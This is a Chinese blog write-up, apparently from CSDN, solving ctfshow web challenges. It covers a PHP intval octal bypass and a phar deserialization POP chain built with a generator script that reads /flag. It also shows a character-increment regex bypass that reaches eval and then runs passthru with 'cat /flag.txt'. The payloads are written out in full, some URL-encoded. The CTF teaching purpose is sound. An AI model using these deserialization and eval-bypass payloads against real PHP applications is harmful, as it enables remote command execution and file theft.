ctfshow吃瓜杯 web

最新推荐文章于 2024-05-18 11:04:16 发布

coleak

最新推荐文章于 2024-05-18 11:04:16 发布

阅读量1k

点赞数 1

分类专栏： # web安全文章标签： php 网络安全 web安全 python

本文链接：https://blog.csdn.net/qq_63701832/article/details/130780534

版权

web安全专栏收录该内容

105 篇文章 4 订阅

订阅专栏

文章目录

热身
ATTup
- 代码审计
- phar反序列化
shellme
shellme_Revenge

热身

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 16:53:59
# @link: https://ctfer.com

*/

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){
        die("no no no!!");
    }
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

查官方文档

intval() 函数用于获取变量的整数值。

intval() 函数通过使用指定的进制 base 转换（默认是十进制），返回变量 var 的 integer 数值。 intval() 不能用于 object，否则会产生 E_NOTICE 错误并返回 1。

PHP 4, PHP 5, PHP 7

语法
int intval ( mixed $var [, int $base = 10 ] )
参数说明：

$var：要转换成 integer 的数量值。
$base：转化所使用的进制。
如果 base 是 0，通过检测 var 的格式来决定使用的进制：

如果字符串包括了 "0x" (或 "0X") 的前缀，使用 16 进制 (hex)；否则，
如果字符串以 "0" 开始，使用 8 进制(octal)；否则，
将使用 10 进制 (decimal)。

?num=+010574

ATTup

查看前端源码查到php文件

upload.php   find.php

任意文件读取漏洞，读取find.php

<!--class View {
    public $fn;
    public function __invoke(){
        $text = base64_encode(file_get_contents($this->fn));
        echo "<script>alert('".$text."');self.location=document.referrer;</script>";
    }
}
class Fun{
    public $fun = ":)";
    public function __toString(){
        $fuc = $this->fun;
        $fuc();
        return "<script>alert('Be a happy string~');self.location=document.referrer;</script>";
    }
    public function __destruct()
    {
        echo "<script>alert('Just a fun ".$this->fun."');self.location=document.referrer;</script>";
    }
}
$filename = $_POST["file"];
$stat = @stat($filename);-->

代码审计

stat

stat
(PHP 4, PHP 5, PHP 7, PHP 8)

stat — 给出文件的信息
这里可以触发phar反序列化

phar反序列化

<?php
class View {
    public $fn;
    public function __invoke(){
//        $text = base64_encode(file_get_contents($this->fn));
//        echo "<script>alert('".$text."');self.location=document.referrer;</script>";
    }
}
class Fun{
    public $fun = ":)";
    public function __toString(){
        $fuc = $this->fun;
        $fuc();
        return "1";
//        return "<script>alert('Be a happy string~');self.location=document.referrer;</script>";
    }
    public function __destruct()
    {
//        echo "<script>alert('Just a fun ".$this->fun."');self.location=document.referrer;</script>";
    }
}
$a=new Fun();
$a->fun=new Fun();
$a->fun->fun=new View();
$a->fun->fun->fn="/flag";

@unlink("phar.phar");
$phar = new Phar("c2.phar");
$phar->startBuffering();
$phar->setStub('GIF89a'.' __HALT_COMPILER();'); //设置stub
$phar->setMetadata($a); //将自定义meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

直接修改后缀为tar

$phar->setStub这行的内容不能出现<?与php，否则会提示内容非法

stub的基本结构：，stub必须以__HALT_COMPILER();`来作为结束部分，否则Phar拓展将不会识别该文件。

然后以phar://c2.tar协议访问即可

alert('Y3Rmc2hvd3szOWFmNDIzMi04MTQ2LTRiMzQtOGUwZS1lYmFiMGExZjY5N2R9Cg==');
解码得到flag

shellme

直接搜索flag得到flag，非预期解？

shellme_Revenge

尝试搜索ctfhsow,flag,ctf,hint等关键词，查看cookie等信息

Set-Cookie	hint=%3Flooklook; expires=Sat, 20-May-2023 04:56:12 GMT; Max-Age=3600
PHP Version 7.2.34

?looklook=1

<?php
error_reporting(0);
if ($_GET['looklook']){
    highlight_file(__FILE__);
}else{
    setcookie("hint", "?looklook", time()+3600);
}
if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow) || strlen($ctfshow) <= 107) {
        if (!preg_match("/[!@#%^&*:'\"|`a-zA-BD-Z~\\\\]|[4-9]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("fucccc hacker!!");
        }
    }
} else {
    phpinfo();
}
?>

生成ascii对应可见字符

with open("ascii.txt","w") as f:
    for i in range(31,128):
        f.writelines(chr(i)+"\n")

查看通过正则的内容

<?php
$myfile = fopen("ascii.txt", "r") or die("Unable to open file!");
while (!feof($myfile)) {
    $ctfshow=fgets($myfile);
    if (is_string($ctfshow) || strlen($ctfshow) <= 107) {
        if (!preg_match("/[!@#%^&*:'\"|`a-zA-BD-Z~\\\\]|[4-9]/", $ctfshow)) {
            echo "$ctfshow";
        }
    }
}
fclose($myfile);

第一行是空格

 
$
(
)
+
,
-
.
/
0
1
2
3
;
<
=

?
C
[
]
_
{
}

这里尝试通过++和c构造任意字符执行命令

在PHP中，如果强制连接数组和字符串的话，数组将被转换成字符串，其值为Array

<?php
$_=C;
$_++; //D
$C=++$_; //E
$_++; //F
$C_=++$_; //G
$_=(C/C.C)[0]; //N
$_++; //O
$_++; //P
$_++; //Q
$_++; //R
$_++; //S
$_=_.$C_.$C.++$_; //_GET
$$_[1]($$_[2]); //$_GET[1]($_GET[2])
?>
    
ctf_show=$_=C;$_++;$C=++$_;$_++;$C_=++$_;$_=(C/C.C)[0];$_++;$_++;$_++;$_++;$_++;$_=_.$C_.$C.++$_;$$_[1]($$_[2]);
ctf_show=%24%5f%3d%43%3b%24%5f%2b%2b%3b%24%43%3d%2b%2b%24%5f%3b%24%5f%2b%2b%3b%24%43%5f%3d%2b%2b%24%5f%3b%24%5f%3d%28%43%2f%43%2e%43%29%5b%30%5d%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%3d%5f%2e%24%43%5f%2e%24%43%2e%2b%2b%24%5f%3b%24%24%5f%5b%31%5d%28%24%24%5f%5b%32%5d%29%3b

?1=passthru&2=cat /flag.txt


ctf_show=%24%5f%3d%43%3b%24%5f%2b%2b%3b%24%43%3d%2b%2b%24%5f%3b%24%5f%2b%2b%3b%24%43%5f%3d%2b%2b%24%5f%3b%24%5f%3d%28%43%2f%43%2e%43%29%5b%30%5d%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%3d%5f%2e%24%43%5f%2e%24%43%2e%2b%2b%24%5f%3b%24%24%5f%5b%31%5d%28%24%24%5f%5b%32%5d%29%3b
%3b%24%43%3d%2b%2b%24%5f%3b%24%5f%2b%2b%3b%24%43%5f%3d%2b%2b%24%5f%3b%24%5f%3d%28%43%2f%43%2e%43%29%5b%30%5d%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%3d%5f%2e%24%43%5f%2e%24%43%2e%2b%2b%24%5f%3b%24%24%5f%5b%31%5d%28%24%24%5f%5b%32%5d%29%3b